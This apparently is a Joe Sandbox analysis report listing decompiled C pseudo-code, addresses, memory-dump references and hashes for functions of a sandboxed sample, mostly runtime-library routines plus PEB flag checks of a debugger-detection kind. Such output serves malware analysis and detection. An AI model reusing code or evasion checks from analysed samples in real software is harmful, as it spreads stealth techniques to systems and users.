						L11:
						 *0x456e94 = 1;
						return 1;
					}
					if(_t15 == 1) {
						_push(3);
					} else {
						_push(4);
					}
					L10:
					_pop(1);
					goto L11;
				}
			}

0x00433999
0x004339a1
0x004339ed
0x004339ed
0x004339a6
0x004339af
0x004339b2
0x004339b6
0x004339bc
0x004339bc
0x004339c4
0x004339c7
0x004339e0
0x00000000
0x004339c9
0x004339c9
0x004339cc
0x004339e3
0x004339ea
0x00000000
0x004339ea
0x004339d1
0x004339d7
0x004339d3
0x004339d3
0x004339d3
0x004339e2
0x004339e2
0x00000000
0x004339e2

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22be758a6adb0d60432d717cb52c54a8124149483f8cdec7a0bbf10c1379f020
Instruction ID: 099c5d46a68d14a9d44862b57f41335ce133cee54f73600cee0436fd72d06fce
Opcode Fuzzy Hash: 22be758a6adb0d60432d717cb52c54a8124149483f8cdec7a0bbf10c1379f020
Instruction Fuzzy Hash: F4F06DB1240204EBC715CE2DC55AB2A72A8EF0D746F216166E145DB790C2B9EF408709

Uniqueness

Uniqueness Score: -1.00%

Function 00433AF8 Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433AF8(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				intOrPtr _t17;
				char _t19;

				_t17 =  *0x456e90; // 0x0
				if(_t17 == 0) {
					_t19 = _t17 + 1;
					_v8 = _t19;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) < 0) {
						L3:
						_t17 = 2;
					} else {
						E0042C985(_t21,  &_v8);
						if(_v8 == _t19) {
							goto L3;
						}
					}
					 *0x456e90 = _t17;
				}
				return _t17;
			}

0x00433aff
0x00433b08
0x00433b10
0x00433b11
0x00433b14
0x00433b17
0x00433b1b
0x00433b2b
0x00433b2d
0x00433b1d
0x00433b21
0x00433b29
0x00000000
0x00000000
0x00433b29
0x00433b35
0x00433b35
0x00433b3b

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1950f124655ca356472c0ac01df2e25c6ef082eaa6531c1ad64f18e230f097a2
Instruction ID: d45114018e4a4ae05ad8277498fe724f1341c4bdd602a1e15f103b6ae1fd5eac
Opcode Fuzzy Hash: 1950f124655ca356472c0ac01df2e25c6ef082eaa6531c1ad64f18e230f097a2
Instruction Fuzzy Hash: 44F0A0316112249BCB16CF4DC845A49B3ADEB0CB16F91009BF401D7252C7B8EE00CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 00433AB4 Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433AB4(void* __ecx) {
				signed int _v8;
				intOrPtr _t10;
				signed int _t18;

				_t18 =  *0x456e8c; // 0x0
				if(_t18 == 0) {
					_v8 = _v8 & _t18;
					_t18 = _t18 + 1;
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t21 =  *((intOrPtr*)(_t10 + 8));
					if( *((intOrPtr*)(_t10 + 8)) >= 0) {
						E0042C9C5(_t21,  &_v8);
						if(_v8 == _t18) {
							_t18 = 2;
						}
					}
					 *0x456e8c = _t18;
				}
				return _t18;
			}

0x00433abb
0x00433ac4
0x00433acc
0x00433acf
0x00433ad0
0x00433ad3
0x00433ad7
0x00433add
0x00433ae5
0x00433ae9
0x00433ae9
0x00433ae5
0x00433af1
0x00433af1
0x00433af7

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 450526282fa59746c0b48478ebfa8f788c47e0f2abd219baaf679c308efe0413
Instruction ID: 2af3c1816339fc5b3b0ad4e2a09d84e032a64efb79f8f693b1a110d209cb3811
Opcode Fuzzy Hash: 450526282fa59746c0b48478ebfa8f788c47e0f2abd219baaf679c308efe0413
Instruction Fuzzy Hash: 29F0A032A11320DFCB16DB4CC806B4A73A8EB0AB12F115057F441E7241C2B4DE00C7C4

Uniqueness

Uniqueness Score: -1.00%

Function 00433950 Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00433950(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x456e90; // 0x0
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E0042C985(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x456e90 = _t16;
					return _t16;
				}
				return _t10;
			}

0x00433956
0x0043395e
0x00433963
0x0043396c
0x0043396f
0x00433973
0x00433979
0x00433979
0x0043398c
0x0043398f
0x00000000
0x0043398f
0x00433992

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf46b60369af572ad1487df4438a5f0cc1211079b289c3a365d8e6f172158d17
Instruction ID: 0d09457cbb72f87b78549dcd0dcb4586d423fdd3237205851cff75f154e5ecd6
Opcode Fuzzy Hash: bf46b60369af572ad1487df4438a5f0cc1211079b289c3a365d8e6f172158d17
Instruction Fuzzy Hash: 51E06576601304EFDB06CF6AC544B4AB3E9EF4834AFA150B9E809C7251D778EE84CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0043390D Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043390D(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t10;
				intOrPtr _t13;
				intOrPtr _t16;

				_t10 =  *0x456e8c; // 0x0
				if(_t10 == 0) {
					_v8 = _a4;
					_t13 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t24 =  *((intOrPtr*)(_t13 + 8));
					if( *((intOrPtr*)(_t13 + 8)) >= 0) {
						E0042C9C5(_t24,  &_v8);
					}
					_t16 = (0 | _v8 == 0x00000001) + 1;
					 *0x456e8c = _t16;
					return _t16;
				}
				return _t10;
			}

0x00433913
0x0043391b
0x00433920
0x00433929
0x0043392c
0x00433930
0x00433936
0x00433936
0x00433949
0x0043394c
0x00000000
0x0043394c
0x0043394f

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d458062dad1a2b1ef3328c212f4ac43caed99e89cda5416e3bf6773139b613
Instruction ID: 6a556400f37b4968dec039c3bb01b8f85f86be2af3824fd6b1587031feb95b54
Opcode Fuzzy Hash: 20d458062dad1a2b1ef3328c212f4ac43caed99e89cda5416e3bf6773139b613
Instruction Fuzzy Hash: 9AE06D76601344DFCB05CF5AC544B0AB3E8EB49755F614079E409D7251D379DE44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00433B3C Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00433B3C(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E0042C945(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00433b49
0x00433b4b
0x00433b4e
0x00433b51
0x00433b54
0x00433b65
0x00433b67
0x00433b56
0x00433b5a
0x00433b63
0x00000000
0x00000000
0x00433b63
0x00433b6c

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c5e350bcb96c2a6f489a11f9badd3f7766d9862eabdc6a7b6172dee6b7e08c
Instruction ID: e863aff8c960359569a309c2c6248416ccd94675d2a57b6e8093621e3828d39c
Opcode Fuzzy Hash: e3c5e350bcb96c2a6f489a11f9badd3f7766d9862eabdc6a7b6172dee6b7e08c
Instruction Fuzzy Hash: A0E04672A11238EBCB24DB8D894498AF2ACEB49B15B51009BB501D3202C274EF00C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 004339EE Relevance: .0, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004339EE(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t11;

				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t17 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E0042C945(_t17,  &_v8);
				}
				return 0 | _v8 != 0x00000001;
			}

0x004339f7
0x00433a00
0x00433a03
0x00433a07
0x00433a0d
0x00433a0d
0x00433a1c

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15ba5a8ea9d18d3a5e5cec67251f9b85c8c98f46ad149fd2a3c371e85be07b2
Instruction ID: 19a3a269f594eabc1ad369ed09480649b95b7668c20267b9011e1130c968e4a8
Opcode Fuzzy Hash: f15ba5a8ea9d18d3a5e5cec67251f9b85c8c98f46ad149fd2a3c371e85be07b2
Instruction Fuzzy Hash: D2E08232A01208EFCB00DFA9C088A4EB3F8EB08358F1048A8E005D3200D238EF80DA00

Uniqueness

Uniqueness Score: -1.00%

Function 00428AA0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428AA0(void* __ecx, void* __eflags) {

				if(E00433B3C(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00428aa8
0x00428ac1
0x00428abc
0x00428abe
0x00428abe

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db52ca2e8d15f4f53ae924edc488a72f0b2a2e6553de8639cc7cb5bb7de82df1
Instruction ID: d3dbf99c8a2ad4bdb3db34307148c7ffb220be041ddbc55d8fa90c51a6620e41
Opcode Fuzzy Hash: db52ca2e8d15f4f53ae924edc488a72f0b2a2e6553de8639cc7cb5bb7de82df1
Instruction Fuzzy Hash: 13C08C3428296086CE29A91092713AE3356A3E1782FC8148FC8020BB42CE1EAC82D644

Uniqueness

Uniqueness Score: -1.00%

Function 0040DF52 Relevance: 37.1, APIs: 20, Strings: 1, Instructions: 332
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0040DF52(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				void* __ebx;
				void* _t98;
				intOrPtr* _t100;
				unsigned int _t104;
				void* _t108;
				void* _t122;
				unsigned int _t127;
				void* _t137;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t147;
				unsigned int _t149;
				signed char _t151;
				void* _t157;
				intOrPtr* _t158;
				void* _t160;
				signed int _t163;
				void* _t166;
				signed int* _t168;
				signed int _t175;
				intOrPtr _t179;
				void* _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t189;
				unsigned int _t200;
				signed int _t228;
				void* _t247;
				signed int _t251;
				intOrPtr* _t254;
				intOrPtr* _t255;
				void* _t256;
				void* _t257;

				_t247 = __edx;
				_t192 =  *0x456018; // 0x0
				_t257 = _t256 - 0x30;
				_t98 =  *_t192;
				if(_t98 == 0) {
					L51:
					E0040AE84(_t192, _a4, 1, _a8);
					L52:
					_t100 = _a4;
					L53:
					return _t100;
				}
				if(_t98 < 0x36 || _t98 > 0x39) {
					if(_t98 != 0x5f) {
						goto L50;
					}
					goto L4;
				} else {
					L4:
					_t189 = _t98 - 0x36;
					_t192 = _t192 + 1;
					 *0x456018 = _t192;
					if(_t189 != 0x29) {
						__eflags = _t189;
						if(_t189 < 0) {
							L50:
							_push(2);
							L49:
							E0040AAF4(_a4);
							goto L52;
						}
						__eflags = _t189 - 3;
						if(__eflags > 0) {
							goto L50;
						}
						L11:
						if(_t189 == 0xffffffff) {
							goto L50;
						}
						_t254 = _a8;
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v12 =  *_t254;
						_v8 =  *((intOrPtr*)(_t254 + 4));
						_t251 = _t189 & 0x00000002;
						if(_t251 == 0) {
							L23:
							if((_t189 & 0x00000004) != 0) {
								_t149 =  *0x456020; // 0x0
								_t151 =  !(_t149 >> 1);
								_t276 = _t151 & 0x00000001;
								_push( &_v52);
								if((_t151 & 0x00000001) == 0) {
									E0040B152( &_v12, E0040C57E(_t247, __eflags));
								} else {
									_t157 = E0040AE59(_t192,  &_v44, 0x20, E0040C57E(_t247, _t276));
									_t257 = _t257 + 0x10;
									_t158 = E0040AEC8(_t157,  &_v28,  &_v12);
									_v12 =  *_t158;
									_v8 =  *((intOrPtr*)(_t158 + 4));
								}
							}
							_t104 =  *0x456020; // 0x0
							_push( &_v52);
							if(( !(_t104 >> 1) & 0x00000001) == 0) {
								_t108 = E0040CC8D();
								_t195 =  &_v12;
								E0040B152( &_v12, _t108);
							} else {
								_t147 = E0040AEC8(E0040CC8D(),  &_v44,  &_v12);
								_t195 =  *_t147;
								_v12 =  *_t147;
								_v8 =  *((intOrPtr*)(_t147 + 4));
							}
							if( *_t254 != 0) {
								_t143 = E0040AE59(_t195,  &_v52, 0x28,  &_v12);
								_t257 = _t257 + 0xc;
								_t144 = E0040AEEA(_t143,  &_v44, 0x29);
								_v12 =  *_t144;
								_v8 =  *((intOrPtr*)(_t144 + 4));
							}
							_t255 = E0040E436(0x456034, 8);
							if(_t255 == 0) {
								_t255 = 0;
							} else {
								 *_t255 = 0;
								 *((intOrPtr*)(_t255 + 4)) = 0;
							}
							E0040F58B(0,  &_v36, _t255);
							E0040AFC2( &_v12, E0040AEEA(E0040AE59(0x456034,  &_v44, 0x28, E0040C1DA( &_v52)),  &_v28, 0x29));
							_t200 =  *0x456020; // 0x0
							if((_t200 & 0x00000060) != 0x60 && _t251 != 0) {
								E0040AFC2( &_v12,  &_v20);
								_t200 =  *0x456020; // 0x0
							}
							_push( &_v52);
							if(( !(_t200 >> 0x13) & 0x00000001) == 0) {
								_t122 = E0040F466();
								_t204 =  &_v12;
								E0040B152( &_v12, _t122);
							} else {
								_t137 = E0040F466();
								_t204 =  &_v12;
								E0040AFC2( &_v12, _t137);
							}
							E0040AFC2( &_v12, E0040E4C0(_t204,  &_v52));
							_t127 =  *0x456020; // 0x0
							_push( &_v52);
							if(( !(_t127 >> 8) & 0x00000001) == 0) {
								E0040B152( &_v12, E004105A5());
							} else {
								E0040AFC2( &_v12, E004105A5());
							}
							if(_t255 == 0) {
								_push(3);
								goto L49;
							} else {
								 *_t255 = _v12;
								 *((intOrPtr*)(_t255 + 4)) = _v8;
								_t100 = _a4;
								 *_t100 = _v36;
								 *((intOrPtr*)(_t100 + 4)) = _v32;
								goto L53;
							}
						}
						if( *_t192 == 0x40) {
							_t228 = _t192 + 1;
							__eflags = _t228;
							 *0x456018 = _t228;
						} else {
							_v28 = "::";
							_v24 = 2;
							_t238 = E0040AA52( &_v44,  &_v28);
							E0040AEC8(_t171,  &_v28,  &_v12);
							_v12 = _v28;
							_v8 = _v24;
							_t175 =  *0x456018; // 0x0
							if( *_t175 == 0) {
								E0040AEC8(E0040AAF4( &_v52, 1),  &_v28,  &_v12);
								_v12 = _v28;
								_t179 = _v24;
							} else {
								_t183 = E0040AE59(_t238,  &_v28, 0x20, E0040F5BA(_t247,  &_v44));
								_t257 = _t257 + 0x10;
								_t184 = E0040AEC8(_t183,  &_v52,  &_v12);
								_t179 =  *((intOrPtr*)(_t184 + 4));
								_v12 =  *_t184;
							}
							_t228 =  *0x456018; // 0x0
							_v8 = _t179;
						}
						_t160 =  *_t228;
						if(_t160 == 0) {
							E0040AEC8(E0040AAF4( &_v52, 1), _a4,  &_v12);
							goto L52;
						} else {
							if(_t160 != 0x40) {
								goto L50;
							}
							_t163 =  *0x456020; // 0x0
							 *0x456018 = _t228 + 1;
							_push( &_v52);
							if((_t163 & 0x00000060) == 0x60) {
								_t166 = E00410576();
								_t192 =  &_v20;
								E0040B152( &_v20, _t166);
							} else {
								_t168 = E00410576();
								_t192 =  *_t168;
								_v20 =  *_t168;
								_v16 = _t168[1];
							}
							goto L23;
						}
					}
					_t185 =  *_t192;
					if(_t185 == 0) {
						goto L51;
					} else {
						_t189 = _t185 - 0x3d;
						_t192 = _t192 + 1;
						 *0x456018 = _t192;
						if(_t189 < 4 || _t189 > 7) {
							_t189 = _t189 | 0xffffffff;
						}
						goto L11;
					}
				}
			}

0x0040df52
0x0040df55
0x0040df5b
0x0040df5e
0x0040df65
0x0040e2e4
0x0040e2ec
0x0040e2f4
0x0040e2f4
0x0040e2f7
0x0040e2fb
0x0040e2fb
0x0040df6d
0x0040df75
0x00000000
0x00000000
0x00000000
0x0040df7b
0x0040df7b
0x0040df7e
0x0040df81
0x0040df82
0x0040df8b
0x0040dfb3
0x0040dfb5
0x0040e2e0
0x0040e2e0
0x0040e2d6
0x0040e2d9
0x00000000
0x0040e2d9
0x0040dfbb
0x0040dfbe
0x00000000
0x00000000
0x0040dfc4
0x0040dfc7
0x00000000
0x00000000
0x0040dfcd
0x0040dfd2
0x0040dfd6
0x0040dfdc
0x0040dfe2
0x0040dfe5
0x0040dfe8
0x0040e0d5
0x0040e0d8
0x0040e0da
0x0040e0e1
0x0040e0e3
0x0040e0e8
0x0040e0e9
0x0040e153
0x0040e0eb
0x0040e0f7
0x0040e0fc
0x0040e109
0x0040e113
0x0040e116
0x0040e116
0x0040e0e9
0x0040e158
0x0040e166
0x0040e167
0x0040e18b
0x0040e192
0x0040e195
0x0040e169
0x0040e179
0x0040e17e
0x0040e183
0x0040e186
0x0040e186
0x0040e19e
0x0040e1aa
0x0040e1af
0x0040e1ba
0x0040e1c4
0x0040e1c7
0x0040e1c7
0x0040e1d6
0x0040e1da
0x0040e1e3
0x0040e1dc
0x0040e1dc
0x0040e1de
0x0040e1de
0x0040e1ea
0x0040e218
0x0040e21d
0x0040e22a
0x0040e237
0x0040e23c
0x0040e23c
0x0040e24a
0x0040e24e
0x0040e261
0x0040e268
0x0040e26b
0x0040e250
0x0040e250
0x0040e257
0x0040e25a
0x0040e25a
0x0040e27e
0x0040e283
0x0040e292
0x0040e293
0x0040e2b0
0x0040e295
0x0040e29f
0x0040e29f
0x0040e2b7
0x0040e2d4
0x00000000
0x0040e2b9
0x0040e2bc
0x0040e2c1
0x0040e2c4
0x0040e2ca
0x0040e2cf
0x00000000
0x0040e2cf
0x0040e2b7
0x0040dff1
0x0040e094
0x0040e094
0x0040e095
0x0040dff7
0x0040dffa
0x0040e005
0x0040e019
0x0040e01b
0x0040e023
0x0040e029
0x0040e02c
0x0040e034
0x0040e07b
0x0040e083
0x0040e086
0x0040e036
0x0040e046
0x0040e04b
0x0040e058
0x0040e05f
0x0040e062
0x0040e062
0x0040e089
0x0040e08f
0x0040e08f
0x0040e09b
0x0040e09f
0x0040e13f
0x00000000
0x0040e0a5
0x0040e0a7
0x00000000
0x00000000
0x0040e0ad
0x0040e0b6
0x0040e0c1
0x0040e0c2
0x0040e11b
0x0040e122
0x0040e125
0x0040e0c4
0x0040e0c4
0x0040e0ca
0x0040e0cf
0x0040e0d2
0x0040e0d2
0x00000000
0x0040e0c2
0x0040e09f
0x0040df8d
0x0040df91
0x00000000
0x0040df97
0x0040df9a
0x0040df9d
0x0040df9e
0x0040dfa7
0x0040dfae
0x0040dfae
0x00000000
0x0040dfa7
0x0040df91

APIs

DName::operator+.LIBCMT ref: 0040E01B
DName::operator+.LIBCMT ref: 0040E058
DName::DName.LIBVCRUNTIME ref: 0040E06C
DName::operator+.LIBCMT ref: 0040E07B
DName::operator+.LIBCMT ref: 0040E109
DName::operator|=.LIBCMT ref: 0040E125
DName::DName.LIBVCRUNTIME ref: 0040E131
DName::operator+.LIBCMT ref: 0040E13F
DName::operator+.LIBCMT ref: 0040E179
DName::operator+.LIBCMT ref: 0040E1BA
UnDecorator::getReturnType.LIBCMT ref: 0040E1EA
operator+.LIBVCRUNTIME ref: 0040E2EC

Strings

4`E, xrefs: 0040E1CC

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
String ID: 4`E
API String ID: 1186856153-3211283174
Opcode ID: f54819c59614ed837b0f46dc1638715bb9e83291477a832203a34e5cc0b8e939
Instruction ID: af99a4ef1bb3f3b5421a48962e2decf2f5238da5d23bca439db817f30e8a10c0
Opcode Fuzzy Hash: f54819c59614ed837b0f46dc1638715bb9e83291477a832203a34e5cc0b8e939
Instruction Fuzzy Hash: 4BC17D71900208AFCB14EFA5D891EEE7BB8AB08304F50047FF506B72D1DA789A55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00435712 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00435712(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x454980) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E0042E2C2(_t46);
							E00434767( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E0042E2C2(_t47);
							E00434C54( *((intOrPtr*)(_t74 + 0x88)));
						}
						E0042E2C2( *((intOrPtr*)(_t74 + 0x7c)));
						E0042E2C2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E0042E2C2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E0042E2C2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E0042E2C2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E0042E2C2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00435883( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
